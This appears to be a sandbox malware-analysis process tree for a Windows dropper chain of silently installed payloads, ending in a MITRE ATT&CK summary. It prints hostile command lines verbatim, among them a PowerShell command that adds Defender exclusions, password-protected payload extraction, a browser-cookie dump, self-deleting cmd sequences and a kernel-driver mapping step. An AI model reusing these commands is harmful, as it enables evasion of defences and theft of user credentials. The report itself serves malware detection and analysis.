C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:117⤵PID:6020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:117⤵PID:6156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:117⤵PID:7144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:117⤵PID:6500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:117⤵PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5300 /prefetch:817⤵PID:1472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5364 /prefetch:817⤵PID:7240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cgw55a0evab\vict.exe"C:\Users\Admin\AppData\Local\Temp\cgw55a0evab\vict.exe" /VERYSILENT /id=53515⤵PID:6468
-
C:\Users\Admin\AppData\Local\Temp\is-O5TIL.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-O5TIL.tmp\vict.tmp" /SL5="$60406,870426,780800,C:\Users\Admin\AppData\Local\Temp\cgw55a0evab\vict.exe" /VERYSILENT /id=53516⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\is-90AH8.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-90AH8.tmp\wimapi.exe" 53517⤵PID:4484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zbbrmdkamba\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\zbbrmdkamba\Setup3310.exe" /Verysilent /subid=57715⤵PID:7060
-
C:\Users\Admin\AppData\Local\Temp\is-6IQEL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-6IQEL.tmp\Setup3310.tmp" /SL5="$80382,802346,56832,C:\Users\Admin\AppData\Local\Temp\zbbrmdkamba\Setup3310.exe" /Verysilent /subid=57716⤵PID:6808
-
C:\Users\Admin\AppData\Local\Temp\is-8K77D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8K77D.tmp\Setup.exe" /Verysilent17⤵PID:6464
-
C:\Users\Admin\AppData\Local\Temp\is-C96IQ.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-C96IQ.tmp\Setup.tmp" /SL5="$204F0,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-8K77D.tmp\Setup.exe" /Verysilent18⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\ProPlugin.exe" /Verysilent19⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\is-N87PC.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-N87PC.tmp\ProPlugin.tmp" /SL5="$803C8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\ProPlugin.exe" /Verysilent20⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\is-0BBRM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0BBRM.tmp\Setup.exe"21⤵PID:4532
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"22⤵PID:6696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\PictureLAb.exe" /Verysilent19⤵PID:3008
-
C:\Users\Admin\AppData\Local\Temp\is-P1LJO.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-P1LJO.tmp\PictureLAb.tmp" /SL5="$903C8,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\PictureLAb.exe" /Verysilent20⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\is-G3U1N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-G3U1N.tmp\Setup.exe" /VERYSILENT21⤵PID:4568
-
C:\Users\Admin\AppData\Local\Temp\is-VCPEC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-VCPEC.tmp\Setup.tmp" /SL5="$D0114,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-G3U1N.tmp\Setup.exe" /VERYSILENT22⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\is-54LNS.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-54LNS.tmp\kkkk.exe" /S /UID=lab21423⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\b9-a54fc-d8c-bc3b6-88ed6f60c83b4\Jimishizhyxu.exe"C:\Users\Admin\AppData\Local\Temp\b9-a54fc-d8c-bc3b6-88ed6f60c83b4\Jimishizhyxu.exe"24⤵PID:5284
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmnjortc.1ow\GcleanerWW.exe /mixone & exit25⤵PID:6180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tnovsnbe.v21\privacytools5.exe & exit25⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\tnovsnbe.v21\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tnovsnbe.v21\privacytools5.exe26⤵PID:6824
-
C:\Users\Admin\AppData\Local\Temp\tnovsnbe.v21\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tnovsnbe.v21\privacytools5.exe27⤵PID:7388
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r0bl0ntk.fne\setup.exe /8-2222 & exit25⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\r0bl0ntk.fne\setup.exeC:\Users\Admin\AppData\Local\Temp\r0bl0ntk.fne\setup.exe /8-222226⤵PID:6928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dark-Dawn"27⤵PID:7324
-
-
C:\Program Files (x86)\Dark-Dawn\7za.exe"C:\Program Files (x86)\Dark-Dawn\7za.exe" e -p154.61.71.13 winamp-plugins.7z27⤵PID:7116
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkum2z2n.fgf\MultitimerFour.exe & exit25⤵PID:6684
-
C:\Users\Admin\AppData\Local\Temp\qkum2z2n.fgf\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\qkum2z2n.fgf\MultitimerFour.exe26⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\5U0ZWOFDRM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5U0ZWOFDRM\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10427⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\5U0ZWOFDRM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5U0ZWOFDRM\multitimer.exe" 1 3.1615014866.60432bd29eb0b 10428⤵PID:472
-
C:\Users\Admin\AppData\Local\Temp\5U0ZWOFDRM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5U0ZWOFDRM\multitimer.exe" 2 3.1615014866.60432bd29eb0b29⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\ddikidnxkh0\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ddikidnxkh0\safebits.exe" /S /pubid=1 /subid=45130⤵PID:8036
-
-
C:\Users\Admin\AppData\Local\Temp\fq3qcf53sbj\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\fq3qcf53sbj\askinstall24.exe"30⤵PID:7416
-
-
C:\Users\Admin\AppData\Local\Temp\rcak4yuakjx\vict.exe"C:\Users\Admin\AppData\Local\Temp\rcak4yuakjx\vict.exe" /VERYSILENT /id=53530⤵PID:8096
-
C:\Users\Admin\AppData\Local\Temp\is-K0O81.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-K0O81.tmp\vict.tmp" /SL5="$2057C,870426,780800,C:\Users\Admin\AppData\Local\Temp\rcak4yuakjx\vict.exe" /VERYSILENT /id=53531⤵PID:4232
-
-
-
C:\Users\Admin\AppData\Local\Temp\xp4figjht1l\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xp4figjht1l\Setup3310.exe" /Verysilent /subid=57730⤵PID:3124
-
C:\Users\Admin\AppData\Local\Temp\is-3TGH1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-3TGH1.tmp\Setup3310.tmp" /SL5="$105C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\xp4figjht1l\Setup3310.exe" /Verysilent /subid=57731⤵PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\cyyxmr3yh1s\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\cyyxmr3yh1s\chashepro3.exe" /VERYSILENT30⤵PID:7636
-
C:\Users\Admin\AppData\Local\Temp\is-H514F.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-H514F.tmp\chashepro3.tmp" /SL5="$10634,2015144,58368,C:\Users\Admin\AppData\Local\Temp\cyyxmr3yh1s\chashepro3.exe" /VERYSILENT31⤵PID:8084
-
-
-
C:\Users\Admin\AppData\Local\Temp\pluqxg5foak\re1thvptm5w.exe"C:\Users\Admin\AppData\Local\Temp\pluqxg5foak\re1thvptm5w.exe" /ustwo INSTALL30⤵PID:6960
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\Delta.exe" /Verysilent19⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\is-V2E0H.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-V2E0H.tmp\Delta.tmp" /SL5="$A03C8,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\Delta.exe" /Verysilent20⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\is-BMJ3R.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BMJ3R.tmp\Setup.exe" /VERYSILENT21⤵PID:204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-BMJ3R.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit22⤵PID:7352
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f23⤵
- Kills process with taskkill
PID:6212
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 623⤵
- Delays execution with timeout.exe
PID:5476
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\zznote.exe" /Verysilent19⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\is-0OF28.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-0OF28.tmp\zznote.tmp" /SL5="$B04AA,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\zznote.exe" /Verysilent20⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\is-GLHED.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-GLHED.tmp\jg4_4jaa.exe" /silent21⤵PID:4180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-IUSKK.tmp\hjjgaa.exe" /Verysilent19⤵PID:7420
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt20⤵PID:7844
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt20⤵PID:5296
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gzgf2ec4jgr\lzwptubs4du.exe"C:\Users\Admin\AppData\Local\Temp\gzgf2ec4jgr\lzwptubs4du.exe" /ustwo INSTALL15⤵PID:6184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 65616⤵
- Program crash
PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 66816⤵
- Program crash
PID:7008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 66816⤵
- Program crash
PID:6368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 82016⤵
- Program crash
PID:3376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 88416⤵
- Program crash
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 93216⤵
- Program crash
PID:5604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 109616⤵
- Program crash
PID:6216
-
-
-
C:\Users\Admin\AppData\Local\Temp\cw5eksfbsdt\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\cw5eksfbsdt\chashepro3.exe" /VERYSILENT15⤵PID:6828
-
C:\Users\Admin\AppData\Local\Temp\is-RRB4J.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-RRB4J.tmp\chashepro3.tmp" /SL5="$40232,2015144,58368,C:\Users\Admin\AppData\Local\Temp\cw5eksfbsdt\chashepro3.exe" /VERYSILENT16⤵PID:688
-
-
-
C:\Users\Admin\AppData\Local\Temp\wh4uufjcauc\app.exe"C:\Users\Admin\AppData\Local\Temp\wh4uufjcauc\app.exe" /8-2315⤵PID:4900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Icy-Dawn"16⤵PID:6380
-
-
C:\Program Files (x86)\Icy-Dawn\7za.exe"C:\Program Files (x86)\Icy-Dawn\7za.exe" e -p154.61.71.13 winamp-plugins.7z16⤵PID:7036
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Icy-Dawn\app.exe" -map "C:\Program Files (x86)\Icy-Dawn\WinmonProcessMonitor.sys""16⤵PID:5208
-
C:\Program Files (x86)\Icy-Dawn\app.exe"C:\Program Files (x86)\Icy-Dawn\app.exe" -map "C:\Program Files (x86)\Icy-Dawn\WinmonProcessMonitor.sys"17⤵PID:4040
-
-
-
C:\Program Files (x86)\Icy-Dawn\7za.exe"C:\Program Files (x86)\Icy-Dawn\7za.exe" e -p154.61.71.13 winamp.7z16⤵PID:4680
-
-
C:\Program Files (x86)\Icy-Dawn\app.exe"C:\Program Files (x86)\Icy-Dawn\app.exe" /8-2316⤵PID:6612
-
C:\Program Files (x86)\Icy-Dawn\app.exe"C:\Program Files (x86)\Icy-Dawn\app.exe" /8-2317⤵PID:5616
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\Delta.exe" /Verysilent4⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\is-9R009.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-9R009.tmp\Delta.tmp" /SL5="$403C8,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\Delta.exe" /Verysilent5⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\is-7DHVO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7DHVO.tmp\Setup.exe" /VERYSILENT6⤵PID:6812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-7DHVO.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f8⤵
- Kills process with taskkill
PID:4972
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:6616
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\zznote.exe" /Verysilent4⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\is-CHUQ3.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-CHUQ3.tmp\zznote.tmp" /SL5="$404A6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\zznote.exe" /Verysilent5⤵PID:6900
-
C:\Users\Admin\AppData\Local\Temp\is-4U08J.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-4U08J.tmp\jg4_4jaa.exe" /silent6⤵PID:6540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\hjjgaa.exe" /Verysilent4⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4600
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6508
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5460
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5636
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1724
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:5580
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7e007d40-ea7c-7942-b13f-c72e7069e254}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:5620
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"2⤵PID:4556
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:5940
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5760
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:4064
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:1096
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:6076
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff608b27740,0x7ff608b27750,0x7ff608b277601⤵PID:6484
-
C:\Users\Admin\AppData\Local\Temp\CDE6.tmp.exeC:\Users\Admin\AppData\Local\Temp\CDE6.tmp.exe1⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\DC3F.tmp.exeC:\Users\Admin\AppData\Local\Temp\DC3F.tmp.exe1⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\DC3F.tmp.exeC:\Users\Admin\AppData\Local\Temp\DC3F.tmp.exe2⤵PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\E122.tmp.exeC:\Users\Admin\AppData\Local\Temp\E122.tmp.exe1⤵PID:6772
-
C:\Users\Admin\AppData\Local\Temp\E122.tmp.exe"{path}"2⤵PID:4864
-
-
C:\Users\Admin\AppData\Local\Temp\E922.tmp.exeC:\Users\Admin\AppData\Local\Temp\E922.tmp.exe1⤵PID:6664
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E922.tmp.exe"2⤵PID:3044
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:5508
-
-
-
C:\Users\Admin\AppData\Local\Temp\ED2A.tmp.exeC:\Users\Admin\AppData\Local\Temp\ED2A.tmp.exe1⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\FCFA.tmp.exeC:\Users\Admin\AppData\Local\Temp\FCFA.tmp.exe1⤵PID:4216
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵PID:5664
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:2840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FCFA.tmp.exe"C:\Users\Admin\AppData\Local\Temp\FCFA.tmp.exe"2⤵PID:6992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 24642⤵
- Program crash
PID:6660
-
-
C:\Users\Admin\AppData\Local\Temp\147A.tmp.exeC:\Users\Admin\AppData\Local\Temp\147A.tmp.exe1⤵PID:6280
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1172
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6876
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6696
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6512
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4424
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6912
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4052
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5732
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3580
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8028
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8012
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4272
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6480
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
2Web Service
1